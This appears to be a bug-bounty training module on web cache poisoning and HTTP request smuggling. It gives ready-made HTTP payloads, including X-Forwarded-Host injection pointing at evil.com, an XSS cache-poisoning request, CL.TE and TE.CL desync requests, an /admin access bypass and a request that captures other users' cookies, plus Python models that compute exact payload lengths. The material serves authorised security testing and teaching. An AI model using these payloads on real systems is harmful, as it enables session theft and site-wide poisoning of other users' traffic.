Advanced Exploitation Techniques
Web Cache Poisoning & Request Smuggling
3 min read
These advanced techniques exploit infrastructure layers between clients and servers. They're complex but yield top-tier bounties.
Web Cache Poisoning
Trick a shared cache into storing a response that was generated from attacker-controlled input, then let the cache hand that response to everyone else:
1. Attacker sends: a request carrying a malicious value in an input the cache ignores (an unkeyed header)
2. Server responds: the application reflects that input into the response
3. Cache stores: the poisoned response under the normal cache key for that URL
4. Victim requests: the same URL, with no malicious header at all
5. Cache serves: the poisoned response to the victim (and to every other visitor until the entry expires)
Cache Keys vs Unkeyed Inputs
Cache Key (the parts of the request that identify a cached entry; two requests with the same key receive the same stored response):
- URL path
- Query parameters
- Host header
Unkeyed Inputs (not part of the key, so the cache ignores them, but the application still processes them):
- X-Forwarded-Host
- X-Original-URL
- X-Forwarded-Scheme
Basic Cache Poisoning
```http
# Test an unkeyed header
GET / HTTP/1.1
Host: example.com
X-Forwarded-Host: evil.com
```
If the response reflects the header, e.g. `<script src="//evil.com/app.js">`, and the response is cacheable, every visitor to `/` receives the poisoned page until the entry expires.
Finding Unkeyed Headers
```http
# Headers worth testing, one request each; add a cache buster (e.g. ?cb=<random>) so the
# only entry you poison is one nobody else requests
X-Forwarded-Host
X-Forwarded-Scheme
X-Original-URL
X-Rewrite-URL
X-Forwarded-For
X-Host
X-Forwarded-Server
```
Use Param Miner (Burp extension): it sends a wordlist of header and parameter names and reports those that change the response without changing the cache key.
Cache Poisoning to XSS
```http
# Scenario: X-Forwarded-Host is reflected unescaped into the page
GET /page HTTP/1.1
Host: example.com
X-Forwarded-Host: "><script>alert(1)</script>
```
If the response is cached, the XSS fires for every user who loads /page, with no link to click. Confirm the reflection behind a cache buster first; poisoning the real entry hits every visitor.
Targeted Cache Poisoning
When the response carries a Vary header (e.g. `Vary: User-Agent`), the cache folds that header into the key, so a poisoned entry is served only to visitors whose User-Agent string matches exactly. That turns a site-wide attack into a targeted one:
1. Learn the target's User-Agent string (for example from their visit to a page you control)
2. Poison the cache with a request that sends that exact User-Agent plus the unkeyed header
3. Send the target a link to the poisoned URL; other visitors keep getting the clean variant
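The poisoning sequence above, the unkeyed-header probing and the Vary-based targeting as one small runnable model (example code added here, not a tool from the page; the cache and application are toy models, example.com and evil.com follow the text, and the User-Agent strings, probe paths and ALLOWED_HOSTS are constructed for the demo):

```python
"""Toy model of web cache poisoning through an unkeyed header.

Example code added to this page, not a tool from the text. Cache and app are models;
example.com / evil.com follow the text, the User-Agent strings, probe paths and
ALLOWED_HOSTS are constructed for the demo."""

ALLOWED_HOSTS = ("example.com",)
CANDIDATE_HEADERS = ("x-forwarded-host", "x-forwarded-scheme", "x-original-url", "x-host")


class Cache:
    """Shared cache keyed on (Host, path). Header names listed in a stored response's
    Vary are folded into the key, so they select a variant instead of being ignored."""

    def __init__(self):
        self.entries = {}  # (host, path) -> [(vary, vary_values, body), ...]

    @staticmethod
    def _vary_values(req, vary):
        return tuple((h, req["headers"].get(h, "")) for h in vary)

    def lookup(self, req):
        for vary, vary_values, body in self.entries.get((req["host"], req["path"]), []):
            if vary_values == self._vary_values(req, vary):
                return body
        return None

    def store(self, req, vary, body):
        key = (req["host"], req["path"])
        self.entries.setdefault(key, []).append((vary, self._vary_values(req, vary), body))


def app_vulnerable(req):
    """Builds the script URL from X-Forwarded-Host, a header the cache never keys on."""
    host = req["headers"].get("x-forwarded-host", req["host"])
    return f'<script src="//{host}/app.js"></script>', ()


def app_fixed(req):
    """Hardened: proxy hints are ignored; only the keyed Host header, checked against an
    allowlist, is used to build absolute URLs."""
    host = req["host"] if req["host"] in ALLOWED_HOSTS else ALLOWED_HOSTS[0]
    return f'<script src="//{host}/app.js"></script>', ()


def app_vary_ua(req):
    """Same flaw as app_vulnerable, but the response carries Vary: User-Agent, so each
    User-Agent string gets its own cache slot (the targeted poisoning case)."""
    return app_vulnerable(req)[0], ("user-agent",)


def serve(cache, app, req):
    """Front end: answer from cache, otherwise call the app and store what it returns."""
    body = cache.lookup(req)
    if body is None:
        body, vary = app(req)
        cache.store(req, vary, body)
    return body


def request(path, headers=None):
    """A client request; header names are lowercased the way a proxy or cache would."""
    return {"host": "example.com", "path": path,
            "headers": {k.lower(): v for k, v in (headers or {}).items()}}


def poisoning_demo(app):
    """Attacker poisons /, then a victim sends a clean request for /. Returns the victim's body."""
    cache = Cache()
    serve(cache, app, request("/", {"X-Forwarded-Host": "evil.com"}))  # miss: response stored
    return serve(cache, app, request("/"))                              # hit: stored copy served


def targeted_demo():
    """With Vary: User-Agent only the slot for the target's UA is poisoned."""
    cache = Cache()
    target_ua = "Mozilla/5.0 (victim)"  # constructed; learned e.g. from a visit to an attacker page
    serve(cache, app_vary_ua, request("/", {"User-Agent": target_ua, "X-Forwarded-Host": "evil.com"}))
    victim = serve(cache, app_vary_ua, request("/", {"User-Agent": target_ua}))
    bystander = serve(cache, app_vary_ua, request("/", {"User-Agent": "Mozilla/5.0 (other)"}))
    return victim, bystander


def find_unkeyed_headers(app, candidates=CANDIDATE_HEADERS):
    """Param Miner-style probe: a header is unkeyed (and reflected) if a canary sent in it
    comes back to a later request that never sent the header. A distinct path per probe
    plays the role of a cache buster so probes cannot poison each other."""
    found = []
    for i, name in enumerate(candidates):
        cache, canary = Cache(), f"canary-{i}.invalid"
        serve(cache, app, request(f"/probe-{i}", {name: canary}))
        if canary in serve(cache, app, request(f"/probe-{i}")):
            found.append(name)
    return found


if __name__ == "__main__":
    print("vulnerable app, victim sees:", poisoning_demo(app_vulnerable))
    print("fixed app, victim sees:     ", poisoning_demo(app_fixed))
    print("targeted (victim, bystander):", targeted_demo())
    print("unkeyed headers found:", find_unkeyed_headers(app_vulnerable))
```

Two fixes are visible in the model: `app_fixed` stops trusting the unkeyed header at all, which is the right answer when the application has no reason to honour proxy hints; the alternative, having the app emit `Vary: X-Forwarded-Host`, makes the header part of the key and is what `app_vary_ua` shows for User-Agent, at the cost of one cache slot per distinct value.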
HTTP Request Smuggling
Exploit discrepancies in how the front-end and back-end servers decide where one HTTP request ends and the next begins on a shared, reused connection.
Why It Works
Client → Front-end (CDN/WAF/Load Balancer) → Back-end Server
The front end multiplexes many clients' requests down one back-end connection. If the front end frames requests by Content-Length while the back end frames by Transfer-Encoding: chunked (or the reverse), the two disagree about the request boundaries, and bytes the front end treated as the tail of one request become the prefix of the next request the back end reads, whoever sent that next request.
CL.TE Smuggling
Front-end: Content-Length, Back-end: Transfer-Encoding
```http
POST / HTTP/1.1
Host: example.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
```
Content-Length: 13 covers the whole body (`0\r\n\r\nSMUGGLED`), so the front end forwards all of it. The back end reads the chunked body, stops at the `0` terminator, and leaves `SMUGGLED` on the connection as the beginning of the next request.
TE.CL Smuggling
Front-end: Transfer-Encoding, Back-end: Content-Length
```http
POST / HTTP/1.1
Host: example.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

```
Content-Length: 3 covers only `8\r\n`. The front end reads the full chunked body (chunk size 8 = the length of `SMUGGLED`, then the `0` terminator) and forwards everything; the back end stops after 3 bytes and treats `SMUGGLED...` as the start of the next request. Disable Burp Repeater's automatic Content-Length update, otherwise it "corrects" the value and the desync disappears.
Detection
Time-based detection: send a request that the front end forwards in full but that the back end cannot finish framing. If the back end is left waiting for more data, the response is delayed or the request times out.
```http
# CL.TE probe
POST / HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 4

1
Z
Q
```
The front end forwards only 4 body bytes (`1\r\nZ`). The back end reads a 1-byte chunk but never receives the CRLF that must follow it, so it blocks; a timeout means CL.TE is possible. Run the CL.TE probe before any TE.CL probe: against a system that is actually CL.TE-vulnerable, the TE.CL probe itself smuggles bytes into other users' requests.
Exploitation Scenarios
Bypass Access Controls
```http
# Smuggle a request to an endpoint the front end blocks; Content-Length is the exact byte
# count of the body below, CRLF line endings included, otherwise the front end hangs
POST / HTTP/1.1
Host: example.com
Content-Length: 67
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Length: 10

x=
```
The smuggled request's own Content-Length: 10 lets it absorb the first 8 bytes of whatever request arrives next, so the back end sees a complete request rather than waiting; send the payload, then an ordinary second request to trigger it. Host: localhost targets back ends that only enforce the "internal hosts only" rule at the front end.
Steal User Requests
```http
# Prefix the next user's request with attacker data; outer Content-Length is the exact body size
POST / HTTP/1.1
Host: example.com
Content-Length: 79
Transfer-Encoding: chunked

0

POST /comment HTTP/1.1
Host: example.com
Content-Length: 500

comment=
```
The back end treats the next user's request, Cookie header included, as the rest of the comment body and stores it; read it back from the comment page. Pick the inner Content-Length just below the size of a typical victim request: too large and the back end waits for bytes that never come. If the endpoint requires `Content-Type: application/x-www-form-urlencoded`, add it to the smuggled request and recount the outer Content-Length.
Cache Poisoning via Smuggling
```http
# Smuggled request whose response will be paired with, and cached for, the next request
POST / HTTP/1.1
Host: example.com
Content-Length: 105
Transfer-Encoding: chunked

0

GET /static/app.js HTTP/1.1
Host: example.com
X-Forwarded-Host: evil.com
Content-Length: 10

x=
```
The back end answers the smuggled GET using the attacker's X-Forwarded-Host; the front end delivers that response to whichever request arrives next (for example another user's request for a static file) and, if the response is cacheable, stores it under that user's URL. This works even when the front end strips or overwrites X-Forwarded-Host, because the smuggled header travels inside what the front end believes is a request body.
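The CL.TE and TE.CL payloads, the timing probe and the request-capture scenario above, played through a Content-Length framer and a chunked framer so the disagreement is visible byte by byte (example code added here, not a tool from the page or from any proxy vendor; the two framers are simplified models of front-end/back-end behaviour, and `VICTIM`, the `/comment` prefix and `/account` path are constructed for the demo):

```python
"""Model of how a Content-Length framer and a chunked framer split one byte stream.
Example code added to this page, not a tool from the text. TECL and PROBE reproduce
the page's payloads; VICTIM and the /comment prefix are constructed."""


def _head(buf):
    """Split one header block off buf: (request_line, headers, rest), or None if the
    blank line that ends the headers has not arrived yet."""
    i = buf.find(b"\r\n\r\n")
    if i < 0:
        return None
    lines = buf[:i].split(b"\r\n")
    hdrs = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        hdrs[name.strip().lower()] = value.strip()
    return lines[0], hdrs, buf[i + 4:]


def frame_by_cl(buf):
    """Framer that honours Content-Length and ignores Transfer-Encoding.
    Returns (requests, leftover, waiting); waiting means it is blocked for more bytes."""
    reqs = []
    while buf:
        parsed = _head(buf)
        if parsed is None:
            return reqs, buf, True
        line, hdrs, rest = parsed
        n = int(hdrs.get(b"content-length", b"0"))
        if len(rest) < n:
            return reqs, buf, True
        reqs.append((line, hdrs, rest[:n]))
        buf = rest[n:]
    return reqs, b"", False


def frame_by_te(buf):
    """Framer that honours Transfer-Encoding: chunked when present, else Content-Length."""
    reqs = []
    while buf:
        parsed = _head(buf)
        if parsed is None:
            return reqs, buf, True
        line, hdrs, rest = parsed
        if hdrs.get(b"transfer-encoding", b"").lower() != b"chunked":
            n = int(hdrs.get(b"content-length", b"0"))
            if len(rest) < n:
                return reqs, buf, True
            reqs.append((line, hdrs, rest[:n]))
            buf = rest[n:]
            continue
        body = b""
        while True:
            j = rest.find(b"\r\n")
            if j < 0:
                return reqs, buf, True  # chunk-size line incomplete
            size, rest = int(rest[:j], 16), rest[j + 2:]
            if size == 0:
                if len(rest) < 2:
                    return reqs, buf, True
                rest = rest[2:]  # CRLF after the 0 chunk (trailers not modelled)
                break
            if len(rest) < size + 2:
                return reqs, buf, True  # chunk data or its CRLF missing: the timing-probe stall
            body, rest = body + rest[:size], rest[size + 2:]
        reqs.append((line, hdrs, body))
        buf = rest
    return reqs, b"", False


def build_clte(prefix):
    """CL.TE payload with Content-Length computed over the whole body, so the front end
    forwards all of it; the back end stops at the 0 chunk and keeps prefix as the next request."""
    body = b"0\r\n\r\n" + prefix
    return (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: %d\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n" % len(body)) + body


# The page's TE.CL payload: Content-Length 3 covers only "8\r\n".
TECL = (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 3\r\n"
        b"Transfer-Encoding: chunked\r\n\r\n8\r\nSMUGGLED\r\n0\r\n\r\n")
# The page's CL.TE timing probe: the front end forwards 4 body bytes ("1\r\nZ").
PROBE = (b"POST / HTTP/1.1\r\nHost: example.com\r\nTransfer-Encoding: chunked\r\n"
         b"Content-Length: 4\r\n\r\n1\r\nZ\r\nQ")
# Constructed: the next user's request on the same back-end connection.
VICTIM = (b"GET /account HTTP/1.1\r\nHost: example.com\r\n"
          b"Cookie: session=victim-secret\r\n\r\n")


def probe_stalls_back_end():
    """CL.TE detection: True when what the CL front end forwards leaves the chunked back end waiting."""
    _, leftover, _ = frame_by_cl(PROBE)
    forwarded = PROBE[:len(PROBE) - len(leftover)]
    reqs, _, waiting = frame_by_te(forwarded)
    return waiting and not reqs


def capture_victim():
    """'Steal user requests': the smuggled POST /comment declares a Content-Length larger
    than its own body, so the chunked back end fills it with the start of VICTIM."""
    prefix = b"POST /comment HTTP/1.1\r\nHost: example.com\r\nContent-Length: 80\r\n\r\ncomment="
    reqs, _, _ = frame_by_te(build_clte(prefix) + VICTIM)
    return reqs[1][0], reqs[1][2]  # request line and body of the 2nd request the back end saw


if __name__ == "__main__":
    payload = build_clte(b"SMUGGLED")
    print("CL.TE front end sees body:", frame_by_cl(payload)[0][0][2])
    print("CL.TE back end (requests, leftover, waiting):", frame_by_te(payload))
    print("probe stalls back end:", probe_stalls_back_end())
    print("captured:", capture_victim())
```

`build_clte` is also the quickest way to get the outer Content-Length right: it counts the body bytes (CRLFs included) instead of guessing, which is the usual reason a hand-written smuggling request silently hangs at the front end rather than desyncing the back end.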
Tools
```bash
# smuggler (defparam) - automated timing-based detection
python3 smuggler.py -u https://example.com
```
Burp Suite's HTTP Request Smuggler extension detects CL.TE, TE.CL and TE.TE desyncs and generates the matching attack requests, Content-Length already computed.
Bounty Examples
| Company | Technique | Bounty |
|---|---|---|
| PayPal | Cache poisoning | $15,000 |
| Cloudflare | Request smuggling | $20,000 |
| Uber | Cache poisoning XSS | $8,000 |
| DoD | Smuggling bypass | $10,000 |
Testing Tips
- Cache poisoning: test every candidate header, use Param Miner, and always add a cache buster (a unique query parameter) so the entry you poison is one only you request
- Request smuggling: time-based detection first, CL.TE probe before TE.CL, and confirm with a differential test (one request with a smuggled prefix, one without) before exploiting
- Always test safely: both bug classes affect other users; never leave a poisoned entry in a shared cache and never smuggle prefixes that capture real users' requests
- Document thoroughly: complex bugs need a clear, reproducible PoC with the exact requests, byte counts and headers involved
Pro Tip: These are James Kettle (albinowax) specialties. Read his research for cutting-edge techniques.
Next module: API and mobile security testing.